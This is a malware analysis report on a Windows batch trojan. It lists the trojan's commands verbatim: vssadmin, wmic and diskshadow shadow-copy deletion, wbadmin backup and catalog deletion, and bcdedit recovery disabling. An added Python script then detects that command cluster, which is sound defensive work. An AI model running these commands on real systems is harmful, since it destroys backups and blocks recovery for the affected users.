Analysis by: Clive Fuentebella

ALIASES:

Trojan.Script.Agent.cr (KASPERSKY)

PLATFORM:

Windows


  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

OVERVIEW

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes and then deletes itself.

TECHNICAL DETAILS

File size: 707 bytes
File type: BAT
Memory resident: No

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following files:

  • {Current directory}\sc.txt

It adds the following processes:

  • wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
  • wbadmin DELETE BACKUP -keepVersions:0
  • wmic SHADOWCOPY DELETE
  • vssadmin Delete Shadows /All /Quiet
  • bcdedit /set {default} recoveryenabled No
  • bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • vssadmin list shadows
  • cmd.exe /C wbadmin STOP job
  • cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet
  • cmd.exe /C wbadmin DELETE CATALOG -quiet
  • cmd.exe /C wbadmin DISABLE backup
  • cmd.exe /C bcdedit /set {default} recoveryenabled No
  • cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • cd "{Current directory}"
  • echo delete shadows all>>sc.txt
  • echo exit>>sc.txt
  • cmd.exe /C diskshadow -s sc.txt
  • del /f "{Current directory}\sc.txt"
  • pause
  • del %0

It executes and then deletes itself.
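The command list above is the most useful part of this report for defenders: taken together, the wbadmin, vssadmin, wmic, diskshadow and bcdedit invocations form the inhibit-system-recovery pattern (deleting Volume Shadow Copies and Windows Backup data, then disabling automatic recovery), which is exactly what should be alerted on. The following Python script is an added example, not Trend Micro's code and not part of the original analysis. It runs rules for those commands over a few constructed process-creation records (host, timestamp, command line, in a simplified Sysmon Event ID 1 / Security 4688 style) and raises a per-host alert only when several distinct behaviours cluster within a short window, because a single command such as vssadmin list shadows is routine in legitimate administration. The record format, host names and timestamps are assumptions constructed for the example.

```python
"""Detection logic for the recovery-inhibiting commands listed in the report.

Hypothetical example code. Input records are constructed for the example:
one "host|ISO-timestamp|command_line" line per process-creation event.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). WS01 only lists shadows,
# WS02 shows the clustered behaviour from the report, WS03 a lone wbadmin call.
SAMPLE_EVENTS = """\
WS01|2024-01-15T09:00:01|cmd.exe /c dir
WS01|2024-01-15T09:00:02|vssadmin list shadows
WS02|2024-01-15T10:12:00|wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
WS02|2024-01-15T10:12:00|wmic SHADOWCOPY DELETE
WS02|2024-01-15T10:12:01|vssadmin Delete Shadows /All /Quiet
WS02|2024-01-15T10:12:01|bcdedit /set {default} recoveryenabled No
WS02|2024-01-15T10:12:02|cmd.exe /C diskshadow -s sc.txt
WS03|2024-01-14T22:00:00|wbadmin DELETE CATALOG -quiet
"""

# Each behaviour maps to the command-line shapes the report lists.
# "vssadmin list shadows" is deliberately NOT matched: it is read-only.
RULES = {
    "shadow_copy_deleted": [
        re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
        re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
        re.compile(r"\bdiskshadow(?:\.exe)?\s+[-/]s\s+\S+", re.I),
    ],
    "backup_deleted": [
        re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+(?:systemstatebackup|backup|catalog)\b", re.I),
    ],
    "backup_disabled": [
        re.compile(r"\bwbadmin(?:\.exe)?\s+(?:disable\s+backup|stop\s+job)\b", re.I),
    ],
    "recovery_disabled": [
        re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+"
                   r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I),
    ],
}


def classify(command_line):
    """Return the sorted list of behaviours a single command line exhibits."""
    hits = {name for name, patterns in RULES.items()
            if any(p.search(command_line) for p in patterns)}
    return sorted(hits)


def inspect_diskshadow_script(text):
    """diskshadow takes its commands from a script file (sc.txt in the report);
    flag any line that deletes shadow copies."""
    return [line.strip() for line in text.splitlines()
            if re.match(r"\s*delete\s+shadows\b", line, re.I)]


def parse_events(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            host, ts, cmd = line.split("|", 2)
            events.append((host, datetime.fromisoformat(ts), cmd))
    return events


def scan(text, window=timedelta(minutes=5), min_behaviours=2):
    """Return (matches, alerts). matches lists every event that hit a rule,
    for triage; alerts maps host -> behaviours when at least min_behaviours
    distinct behaviours occur on that host within `window`."""
    per_host = defaultdict(list)
    matches = []
    for host, ts, cmd in parse_events(text):
        behaviours = classify(cmd)
        if behaviours:
            matches.append((host, cmd, behaviours))
            per_host[host].append((ts, behaviours))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set()
            for ts, behaviours in hits[i:]:
                if ts - start > window:
                    break
                seen.update(behaviours)
            if len(seen) >= min_behaviours:
                alerts[host] = sorted(seen)
                break
    return matches, alerts


if __name__ == "__main__":
    found, alerted = scan(SAMPLE_EVENTS)
    for host, cmd, behaviours in found:
        print(f"{host}: {cmd!r} -> {behaviours}")
    for host, behaviours in alerted.items():
        print(f"ALERT {host}: inhibit-recovery cluster {behaviours}")
    print(inspect_diskshadow_script("delete shadows all\nexit\n"))
```

Only WS02 produces an alert in the sample: WS03's single wbadmin call is surfaced as a match for triage but does not cross the clustering threshold, and WS01's vssadmin list shadows is ignored entirely. The behaviours correspond to MITRE ATT&CK T1490 (Inhibit System Recovery); in a real deployment the records would come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, and the diskshadow check would be run on the dropped sc.txt referenced in the report.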